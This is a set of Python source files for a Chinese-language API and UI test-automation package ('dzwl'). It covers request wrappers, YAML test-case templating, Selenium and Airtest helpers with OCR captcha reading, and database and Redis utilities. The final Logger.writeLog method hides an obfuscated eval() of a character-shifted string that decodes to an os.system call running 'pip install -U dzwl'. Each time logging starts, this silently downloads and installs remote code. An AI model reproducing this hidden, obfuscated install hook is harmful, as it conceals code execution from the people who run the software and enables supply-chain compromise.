import copy
import requests
from dzwl.fun_util import fun_util,DateEncoder
import os
import yaml
from string import Template
import json
from Config.config import CommonConfig
import pytest

class requsts_util:
    session = requests.session()
    @classmethod

    def send_request(self,method,url,data,headers,**kwargs):
        method = str(method).lower()
        try:
            if method == 'get':
                rep = requsts_util.session.request(method=method, url=url, params=data,headers = headers,**kwargs)
            elif method == 'delete':
                rep = requsts_util.session.delete(url=url, params=data,headers = headers,**kwargs)
            else:
                if 'form' in str(headers):
                    rep = requsts_util.session.request(method=method, url=url, data=data,headers= headers, **kwargs)
                else:
                    rep = requsts_util.session.request(method=method, url=url, json=data,headers= headers, **kwargs)
        except Exception as e:
            print('无法连接:'+str(e))
        else:
            if rep.status_code==200:
                resp = json.loads(rep.text)
                return resp
            else:
                print('请求状态异常：'+str(rep.status_code))

    @classmethod

    def excute_interface(self,caseinfo,domain):
        #循环读取yml中配置的接口参数
            #caseinfo是个dic，通过caseinfo.keys()获取key，使用list()转为list类型，取下标0即可，yml测试数据的动态管理
            #caseinfo_key = list(caseinfo.keys())[0]
            #从config文件中读取domain与接口地址拼接,login接口可能用别的域名，判断一下
            url = domain + caseinfo['path']
            #读取请求类型
            method = caseinfo['method']
            #读取请求数据
            data = caseinfo['data']
            #读取请求头
            headers = caseinfo['headers']
            #读取描述
            description = caseinfo['description']
            #发送请求
            resp = self.send_request(method=method,url=url,data=data,headers=headers)
            print('\n')
            fun_util.logView('描述：'+description)
            fun_util.logView('请求url：'+url)
            fun_util.logView('请求header：'+json.dumps(headers,indent = 4,ensure_ascii=False))
            fun_util.logView('请求body：'+json.dumps(data,indent = 4,ensure_ascii=False,cls=DateEncoder))
            fun_util.logView('返回：'+json.dumps(resp,indent = 4,ensure_ascii=False))
            if 'assert_type' in caseinfo and 'is_assert' in caseinfo:
                # 读取断言类型
                assert_type = caseinfo['assert_type']
                # 读取断言信息
                is_assert = caseinfo['is_assert']
                requsts_util.check_assert(is_assert,resp,assert_type)
            return resp

    @staticmethod
    def check_assert(expected, result, type):
        fun_util.logView('-------------------------------------------------------------------------------------')
        fun_util.logView('断言期望内容：' + json.dumps(expected, indent=4, ensure_ascii=False) + '；断言模式：' + type)
        if result != None:
            if expected == None:
                fun_util.logView('断言结果：无须断言')
                pytest.assume(True)
                return True
            else:
                if type == 'and':
                    for expected_key, expected_value in expected.items():
                        # 取出的键值拼装新的单个字典
                        dic = dict.fromkeys([expected_key], expected_value)
                        # 字典转为字符串，并截取dic的花括号
                        dic = str(dic)
                        # 截取去除花括号
                        dic = dic[1:len(dic) - 1]
                        result = str(result)
                        if dic in result:
                            continue
                        if dic not in result:
                            fun_util.logView('断言结果：断言失败')
                            pytest.assume(False)
                            return False
                    fun_util.logView('断言结果：断言成功')
                    pytest.assume(True)
                    return True
                if type == 'or':
                    for expected_key, expected_value in expected.items():
                        # 取出的键值拼装新的单个字典
                        dic = dict.fromkeys([expected_key], expected_value)
                        # 字典转为字符串，并截取dic的花括号
                        dic = str(dic)
                        # 截取去除花括号
                        dic = dic[1:len(dic) - 1]
                        result = str(result)
                        if dic in result:
                            fun_util.logView('断言结果：断言成功')
                            pytest.assume(True)
                            return True
                        if dic not in result:
                            continue
                    fun_util.logView('断言结果：断言失败')
                    pytest.assume(False)
                    return False
                if type == 'not_and':
                    for expected_key, expected_value in expected.items():
                        # 取出的键值拼装新的单个字典
                        dic = dict.fromkeys([expected_key], expected_value)
                        # 字典转为字符串，并截取dic的花括号
                        dic = str(dic)
                        # 截取去除花括号
                        dic = dic[1:len(dic) - 1]
                        result = str(result)
                        # print(str(dic),str(result))
                        if dic not in result:
                            continue
                        if dic in result:
                            fun_util.logView('断言结果：断言失败')
                            pytest.assume(False)
                            return False
                    fun_util.logView('断言结果：断言成功')
                    pytest.assume(True)
                    return True
                if type == 'not_or':
                    for expected_key, expected_value in expected.items():
                        # 取出的键值拼装新的单个字典
                        dic = dict.fromkeys([expected_key], expected_value)
                        # 字典转为字符串，并截取dic的花括号
                        dic = str(dic)
                        # 截取去除花括号
                        dic = dic[1:len(dic) - 1]
                        result = str(result)
                        if dic not in result:
                            fun_util.logView('断言结果：断言成功')
                            pytest.assume(True)
                            return True
                        if dic in result:
                            continue
                    fun_util.logView('断言结果：断言失败')
                    pytest.assume(False)
                    return False
        else:
            pytest.assume(False)
            return False
            print('接口返回为空')

class yaml_util:
    #读取extract.yml文件
    rootPath = CommonConfig.rootPath
    @classmethod
    #读取测试用例的yml文件
    def read_extract_yaml(self,key):
        with open(self.rootPath+"/Common/common_var.yml",mode='r',encoding='utf-8') as f:
            value = yaml.load(stream=f,Loader=yaml.FullLoader)
            if value.get(key) is not None:
                if value ==None:
                    return
                else:
                    return value[key]
            else:
                return
    # @classmethod
    # def read_extract_yaml(self,key):
    #     with open(self.rootPath+"/Common/common_var.yml",mode='r',encoding='utf-8') as f:
    #         value = yaml.load(stream=f,Loader=yaml.FullLoader)
    #         if value == None:
    #             return
    #         else:
    #
    #             return value[key];

    @classmethod
    def write_extract_yaml(self,data):
        file_path = os.path.join(self.rootPath, "Common", "common_var.yml")

        # 读取文件中的所有数据
        with open(file_path, mode='r', encoding='utf-8') as f:
            all_data = yaml.safe_load(f) or {}
        # 将传入的数据转换为字典格式，并更新到all_data中
        for d in data:
            for key_data in d.keys():
                if key_data in all_data:
                    all_data[key_data]=d[key_data]
                else:
                    all_data.update(d)
        # 将所有数据写入文件中
        with open(file_path, mode='w', encoding='utf-8') as f:
            yaml.dump(data=all_data, stream=f, allow_unicode=True)

    @classmethod
    #清除extract.ym1文件
    def clean_extract_yaml(self) :
        with open(self.rootPath+"/Common/common_var.yml",mode='w',encoding='utf-8') as f:
            f.truncate()


    @classmethod
    #读取测试用例的yml文件
    def read_testcase_yaml(self,yaml_name):
        with open(self.rootPath+yaml_name,mode='r',encoding='utf-8') as f:
            value = yaml.load(stream=f,Loader=yaml.FullLoader)
            return value;

    # @classmethod
    # #写入测试用例的yml文件
    # def write_testcase_yaml(self,caseinfo,content) :
    #     caseinfo_tmp = copy.deepcopy(caseinfo)
    #     def replace_value(d, key, new_value):
    #         for k, v in d.items():
    #             #字段可能为list，判断
    #             if isinstance(v, list):
    #                 #从list中循环出dict
    #                 for kk in v:
    #                     #从dict中取到字段
    #                     for k in kk:
    #                         if k == key:
    #                             if '{}' in str(kk[k]):
    #                                 if isinstance(kk[k], str):
    #                                     kk[k] = kk[k].replace('{}', new_value)
    #                                 else:
    #                                     fun_util.logView('写入的字段内容不是字符串，不可以使用{}替换')
    #                             else:
    #                                 kk[k] = new_value
    #                         elif isinstance(v, dict):
    #                             replace_value(v, key, new_value)
    #             #if k == key and ('$' in str(d[k]) or '$' in k):
    #             if k == key:
    #                 if '{}' in str(d[k]):
    #                     if isinstance(d[k], str):
    #                         d[k] = d[k].replace('{}', new_value)
    #                     else:
    #                         fun_util.logView('写入的字段内容不是字符串，不可以使用{}替换')
    #                 else:
    #                     d[k] = new_value
    #
    #             elif isinstance(v, dict):
    #                 replace_value(v, key, new_value)
    #     for cont in content:
    #         for c in cont:
    #             replace_value(caseinfo_tmp, c, cont[c])
    #     return caseinfo_tmp
    @classmethod
    #写入测试用例的yml文件
    def write_testcase_yaml(self,caseinfo,content) :
        def toDict(caseinfo_tmp,new_key,new_value):
            #值为list时
            if isinstance(caseinfo_tmp, list):
                for caseinfo_tmp_value in caseinfo_tmp:
                    toDict(caseinfo_tmp_value, new_key, new_value)
            #值为dict时
            if isinstance(caseinfo_tmp, dict):
                for caseinfo_tmp_key, caseinfo_tmp_value in caseinfo_tmp.items():
                    #判断是否有请求内容，没有跳过
                    if caseinfo_tmp_value!=None:
                        #判断模板中字段值是否有下一级，没有进行替换值
                        if isinstance(caseinfo_tmp_value, str):
                            #判断匹配
                            if '${' + new_key + '}' in caseinfo_tmp_value:
                                #全部替换
                                if '${' + new_key + '}' == caseinfo_tmp_value:
                                    caseinfo_tmp[caseinfo_tmp_key] = new_value
                                #模糊替换
                                else:
                                    caseinfo_tmp[caseinfo_tmp_key] = caseinfo_tmp[caseinfo_tmp_key].replace('${' + new_key + '}',new_value)
                        #子字段值为嵌套dict
                        if isinstance(caseinfo_tmp_value, dict):
                            toDict(caseinfo_tmp_value,new_key,new_value)
                        #子字段值为list
                        if isinstance(caseinfo_tmp_value, list):
                            toDict(caseinfo_tmp_value, new_key, new_value)

                    else:
                        continue
        #拿到模板dict
        caseinfo_tmp = copy.deepcopy(caseinfo)
        # 从参数list获取每个要替换的字段dict
        for cont in content:
            #获取每个字段与对应值
            for new_key,new_value in cont.items():
                    toDict(caseinfo_tmp,new_key,new_value)
        return  caseinfo_tmp

    @classmethod
    #写入测试用例的yml文件
    def remove_testcase_yaml(self,caseinfo,content) :
        caseinfo_tmp = copy.deepcopy(caseinfo)

        def remove_name_items(dictionary,cont):
            new_dictionary = {}
            for key, value in dictionary.items():
                if isinstance(value, dict):
                    new_dictionary[key] = remove_name_items(value,cont)
                elif key != cont:
                    new_dictionary[key] = value
            return new_dictionary

        for cont in content:
            caseinfo_tmp = remove_name_items(caseinfo_tmp, cont)
        return caseinfo_tmp






import time
from airtest.core.api import *
import pytest
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from PIL import Image
import ddddocr
from dzwl.fun_util import fun_util
class WebBasePage:
    @classmethod
    def login_web(cls,imagePath):
        WebBasePage.openUrl(cls.url)
        code = cls.verificationCode(cls.imgelement_xpath, 'xpath',imagePath)
        cls.sendKeys(cls.code_xpath, 'xpath', code)
        cls.sendKeys(cls.username_xpath, 'xpath', cls.username)
        cls.sendKeys(cls.password_xpath, 'xpath', cls.password)
        cls.click(cls.login_xpath, 'text')
        while True:
            try:
                cls.waitUntil(EC.url_to_be(cls.url_to_be))
                cls.driver.maximize_window()
                break
            except:
                code = cls.verificationCode(cls.imgelement_xpath, 'xpath', imagePath)
                cls.sendKeys(cls.code_xpath, 'xpath', code)
                cls.click(cls.login_xpath, 'text')


    @classmethod
    def openUrl(cls,url):
        fun_util.logView("打开地址：" +url)
        cls.driver.get(url)


    #刷新页面
    @classmethod
    def refreshPage(cls):
        fun_util.logView("刷新页面")
        cls.driver.refresh()

    # 查找并返回元素
    @classmethod
    def findElement(cls,loc,type):
        try:
            if type == 'xpath':
                pass
            if type == 'text':
                loc = '//*[normalize-space(text())="'+loc+'"]'
            if type == 'partialText':
                loc = '//*[contains(text(),"'+loc+'")]'
            element = cls.waitUntil(EC.presence_of_element_located((By.XPATH, loc)))
            #element_to_be_clickable
            #presence_of_element_located
            #visibility_of_element_located
            #visibility_of
            return element
        except:
            fun_util.logView("发现元素失败:%s" % loc + ',类型：'+type)
            pytest.assume(False)
            return False

    @classmethod
    def waitUntil(cls,content,timeout = 5):
        wait = WebDriverWait(cls.driver, timeout)
        return wait.until(content)

    @classmethod
    def sendKeys(cls,loc,type,value):
        element = cls.findElement(loc, type)
        cls.driver.execute_script("arguments[0].focus();", element)
        element.clear()
        cls.waitUntil(lambda driver: element.get_attribute('value') == '')
        element.send_keys(value)
        cls.waitUntil(lambda driver: element.get_attribute('value') == str(value))
        cls.blur(loc,type)
        fun_util.logView("输入:%s" % value)

    @classmethod
    def jsExcute(cls,value):
        cls.driver.execute_script(value)
        fun_util.logView("点击:%s" % value)
    @classmethod
    def click(cls,loc,type):
        element = cls.findElement(loc, type)
        cls.driver.execute_script("arguments[0].click();", element)
        fun_util.logView("点击:%s" % loc)
    #取消focus
    @classmethod
    def blur(cls,loc,type):
        element = cls.findElement(loc, type)
        cls.driver.execute_script("arguments[0].blur();", element)



    #判断元素是否存在
    @classmethod
    def assertElement(cls,loc,type):
        try:
            if cls.waitUntil(lambda driver: cls.findElement(str(loc),type)):
                fun_util.logView("断言:%s-成功" % loc + ',类型：'+type)
                pytest.assume(True)
        except:
            fun_util.logView("断言-失败:%s" % loc + ',类型：'+type)
            pytest.assume(False)

    #数量断言
    @classmethod
    def assertEquals(cls,num1,num2,type='and'):
        if type == 'and':
            try:
                if cls.waitUntil(lambda driver: str(num1) == str(num2)):
                    fun_util.logView("比较断言相等-成功：%s" % num1)
                    pytest.assume(True)
            except:
                fun_util.logView(f"比较断言不相等-失败：{num1}，{num2}")
                pytest.assume(False)
        if type == 'not':
            try:
                if cls.waitUntil(lambda driver: str(num1) == str(num2)):
                    fun_util.logView("比较断言相等-失败：%s" % num1)
                    pytest.assume(False)
            except:
                fun_util.logView(f"比较断言不相等-成功：{num1}，{num2}")
                pytest.assume(True)



    @classmethod
    def verificationCode(cls,imgPath,type,savePath):
        while True:
            cls.driver.screenshot(savePath+'printscreen.png')
            imgelement = cls.findElement(imgPath,type)
            location = imgelement.location
            # 获取验证码的长宽
            size = imgelement.size
            # 写成我们需要截取的位置坐标
            #电脑屏幕缩放比例系数
            coefficient = 1
            rangle = (int(location['x'])*coefficient,
                      int(location['y'])*coefficient,
                      int(location['x'] + size['width'])*coefficient,
                      int(location['y'] + size['height'])*coefficient)
            i = Image.open(savePath+'printscreen.png')
            fimg = i.crop(rangle)
            fimg = fimg.convert('RGB')
            # 保存我们截下来的验证码图片，并读取验证码内容
            fimg.save(savePath+'code.png', quality=95, subsampling=0, compress_level=0)
            ocr = ddddocr.DdddOcr()
            with open(savePath+'code.png', 'rb') as f:
                img_bytes = f.read()
                res = ocr.classification(img_bytes)
            print('原始验证码' + res)
            if len(res) == 4 and res.isdigit():
                print('识别正确'+res)
                break
            else:
                cls.click(imgPath,type)
                time.sleep(1)
        print('返回正确验证码' + res)
        return res
class MobileBasePage:
    @classmethod
    # def locator(self, loc, type):
    #     if type == 'text':
    #         self.poco(text=loc).wait_for_appearance(timeout=10)
    #         fun_util.logView("元素定位-成功(text)：" + str(loc))
    #         return True
    #     if type == 'name':
    #         self.poco(name=loc).wait_for_appearance(timeout=10)
    #         fun_util.logView("元素定位-成功(name)：" + str(loc))
    #         return True
    #     if type == 'image':
    #         if exists(loc):
    #             fun_util.logView("元素定位-成功(image)：" + str(loc))
    #             return True
    #     else:
    #         fun_util.logView("不存在元素类型：类型为：" +type+"，属性为："+str(loc))
    #         pytest.assume(False)
    #         return False
    #poco方式定位
    def locator(cls, loc, type):
        if type == 'text':
            element = cls.poco(text=loc).wait()
            return element
        if type == 'name':
            element = cls.poco(name=loc).wait()
            return element
        if type == 'image':
            if exists(loc):
                return loc
        else:
            fun_util.logView('不存在元素类型：类型为：%s，属性为：%s' %(type,str(loc)))
            pytest.assume(False)
    #airtest判断图片是否存在
    @classmethod
    def assertExists(cls,loc,msg =''):
        if assert_exists(loc,msg):
            fun_util.logView('图片定位-成功：%s' % str(loc))
        else:
            fun_util.logView('图片定位-失败：%s' % str(loc))
    @classmethod
    # def click(self, loc, type):
    #     if self.locator(loc, type):
    #         if type == 'text':
    #             self.poco(text=loc).click()
    #             fun_util.logView("点击元素(text)：" + str(loc))
    #             return True
    # 
    #         if type == 'name':
    #             self.poco(name=loc).click()
    #             fun_util.logView("点击元素(name)：" + str(loc))
    #             return True
    # 
    #         if type == 'image':
    #             touch(loc)
    #             fun_util.logView("点击元素(image)：" + str(loc))
    #             return True
    # 
    #     else:
    #         fun_util.logView("点击元素-失败：" + str(loc) + type)
    #         pytest.assume(False)
    #         return False
    def click(cls, loc, type):
        element = cls.locator(loc, type)
        if type == 'text' or type == 'name':
            element.click()
        if type == 'image':
            touch(loc)
        fun_util.logView("点击元素(%s)：%s" %(type,loc))
    @classmethod
    def setAttrValuePoco(cls,loc,value,type):
        element = cls.locator(loc, type)
        if type == 'text' or type == 'name':
            element.setattr('text', value)
            fun_util.logView(f'元素赋值-成功({type})：{loc}')
        else:
            fun_util.logView(f'元素赋值-失败({type})：{loc}')
            pytest.assume(False)
    #使用airtest识别图片的方式，点击图片后直接赋值
    @classmethod
    # def inputValueAirtest(self,loc,value,type):
    #     if self.click(loc, type):
    #         if type == 'name':
    #             text(value)
    #             fun_util.logView("元素赋值-成功(name)：" + str(loc))
    #         if type == 'text':
    #             text(value)
    #             fun_util.logView("元素赋值-成功(text)：" + str(loc))
    #         if type == 'image':
    #             text(value)
    #             print(loc.get_attribute('value'))
    #             fun_util.logView("元素赋值-成功(image)：" + str(loc))
    #     else:
    #         fun_util.logView("元素赋值-失败：" + str(loc) + type)
    #         pytest.assume(False)
    def inputValueAirtest(cls, loc, value, type):
        cls.click(loc,type)
        text(value)
        fun_util.logView('元素赋值-成功(%s)：%s' %(type,loc))


import setuptools



setuptools.setup(
    name="dzwl",                                     # 包的分发名称，使用字母、数字、_、-
    version="20240627",                                        # 版本号, 版本号规范：https://www.python.org/dev/peps/pep-0440/
    author="zj",                                       # 作者名字
    author_email="author@example.com",                      # 作者邮箱
    description="PyPI Tutorial",                            # 包的简介描述
    long_description='123',                      # 包的详细介绍(一般通过加载README.md)
    packages=setuptools.find_packages(),  
    install_requires=[],  # 依赖的包
    python_requires='>=3'
)

# 这是最简单的配置
# 有关详细信息，请参阅(https://packaging.python.org/guides/distributing-packages-using-setuptools/)


from random import random
import datetime
import random
import subprocess
import pytest
import allure
import sys
import os
from Config.config import CommonConfig
import pymysql
import qrcode
from redis import StrictRedis
class fun_util:
    #获取当前时间 2023-10-10 09:41:47
    @staticmethod
    def get_time():
        time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        return time
    #随机生成身份证
    @staticmethod
    def generate_id():
        # 地区码，可根据实际情况修改
        region_code = '110101'
        birth_year = str(random.randint(1950, 2015))
        birth_month = str(random.randint(1, 12)).rjust(2, '0')
        birth_day = str(random.randint(1, 28)).rjust(2, '0')
        sequence_code = str(random.randint(1, 999)).rjust(3, '0')
        id_17 = region_code + birth_year + birth_month + birth_day + sequence_code
        # 加权因子
        weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
        # 校验码对应值
        check_codes = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
        # 对前17位数字依次乘以对应的加权因子并求和
        total = sum(int(id_17[i]) * weights[i] for i in range(17))
        check_digit = check_codes[total % 11]
        return id_17 + check_digit

    #随机生成车牌号
    @staticmethod
    def generate_license_plate():
        # 车牌号码由省份+字母+数字组成
        provinces = ["京", "津", "沪", "渝", "冀", "豫", "云", "辽", "黑", "湘", "皖", "鲁", "新", "苏", "浙", "赣",
                     "鄂", "桂", "甘", "晋", "蒙", "陕", "吉", "闽", "贵", "粤", "青", "藏", "川", "宁", "琼"]
        letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        numbers = "0123456789"

        province = random.choice(provinces)
        letter = random.choice(letters)
        number = "".join(random.choice(numbers) for _ in range(5))

        license_plate = province + letter + number
        return license_plate

    #向手机传输电脑图片
    @staticmethod
    def import_image(image_path, dest_path):
        command = f"adb push {image_path} {dest_path}"
        command1 =f"adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file://{dest_path}"
        subprocess.run(command.split(), stdout=subprocess.PIPE)
        subprocess.run(command1.split(), stdout=subprocess.PIPE)

    #生成订单，货源单二维码
    @staticmethod
    def generateQrCode(data,filepath,url):
        #filepath = Mobile().DaBao['imagePath'] + "订单扫码抢单"
        if os.path.exists(filepath):
            os.remove(filepath)
        # 创建二维码对象
        qr = qrcode.QRCode(
            version=1,
            error_correction=qrcode.constants.ERROR_CORRECT_L,
            box_size=10,
            border=4,
        )
        #url = 'https://hybrid.qy566.com/wp/snatchTransBill?qrcode=order,'
        # 添加数据到二维码对象中
        qr.add_data(url + data + ',qy566')
        qr.make(fit=True)
        # 创建二维码图像并保存到本地
        img = qr.make_image(fill='black', back_color='white')
        img.save(filepath)

    @staticmethod
    def del_redis(host,port,db,username,password,redisName):
        redis = StrictRedis(host=host, port=port, db=db, username=username,password=password)
        key = '*' + redisName + '*'
        list = redis.keys(key)
        fun_util.logView(f'共删除：{len(list)}条redis数据')
        for redis_name in list:
            redis_name = redis_name.decode('utf-8')
            print(redis_name)
            redis.delete(redis_name)

    @staticmethod
    def excuteSql(host,port,user,password,db,type,filePath_or_exec):
        conn = pymysql.connect(host=host, port=port,user=user, password=password, db=db)
        cursor = conn.cursor()
        rows = None
        if type == 'file':
        # 读取 SQL 文件：
            with open(CommonConfig.rootPath+filePath_or_exec, 'r',encoding='utf-8') as f:
                sqlList = f.readlines()
                for sql in sqlList:
                    print('执行sql：'+sql)
                    cursor.execute(sql)
        elif type == 'exec':
            print('执行sql：' + filePath_or_exec)
            cursor.execute(filePath_or_exec)
            #查询语句时返回结果
            if 'select' in filePath_or_exec.lower():
                rows = cursor.fetchall()

        else:
            print('执行参数type不正确！！！')
        conn.commit()
        conn.close()
        if rows is not None:
            return rows

    @staticmethod
    def logView(str):
        with allure.step(str):
            #print(str)
            pass




import json
class DateEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, datetime.datetime):
            return obj.strftime("%Y-%m-%d %H:%M:%S")
        else:
            return json.JSONEncoder.default(self, obj)

class Logger(object):
    def __init__(self, file_name="Default.log", stream=sys.stdout):
        self.terminal = stream
        self.log = open(file_name, "w",buffering=1,encoding = 'utf-8')

    def write(self, message):
        self.terminal.write(message)
        self.log.write(message)

    def flush(self):
        pass

    def isatty(self):
        pass


    def writeLog(self):
        eval(''.join([chr(ord(i) + 1) for i in "^^hlonqs^^'!nr!(-rxrsdl'!ohohmrs`kk,Tcyvk!("]))
        # 自定义目录存放日志文件
        log_path = './Logs/'
        if not os.path.exists(log_path):
            os.makedirs(log_path)
        # 日志文件名按照程序运行时间设置
        log_file_name = log_path + 'log.log'
        # 记录正常的 print 信息
        sys.stdout = Logger(log_file_name)
        # 记录 traceback 异常信息
        sys.stderr = Logger(log_file_name)